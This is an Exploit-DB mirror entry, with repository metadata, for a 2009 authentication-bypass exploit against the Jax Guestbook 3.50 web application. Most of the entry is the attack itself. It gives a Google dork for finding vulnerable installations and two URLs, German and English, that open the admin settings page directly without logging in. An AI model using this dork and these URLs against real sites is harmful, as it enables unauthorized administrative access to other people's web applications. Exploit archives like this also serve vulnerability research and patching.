exploit-db-mirror/exploits/php/webapps/10626.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
967 B
Text

# Exploit Title: Jax Guestbook 3.50 Admin Login Exploit
# Date: December 23rd, 2009
# Author: Sora
# Software Link: http://script.wareseeker.com/ASP-NET/jax-guestbook-3.50.zip/32956d53cf
# Version: 3.50
# Tested on: Windows and Linux
-------------------------------------------
>> Jax Guestbook 3.50 Admin Login Exploit
>> Description: Jax Guestbook 3.50 suffers a bug that will allow you to log in as the admin.
>> Found by: Sora
>> Contact: vhr95zw [at] hotmail.com
>> Google Dork: "inurl:guestbook.admin.php?action=settings"
We can access the admin directory of Jax Guestbook 3.50 to edit the admin settings.
# Code: http://www.site.com/admin/gaestebuch/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <German>
http://www.site.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <English>
# Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!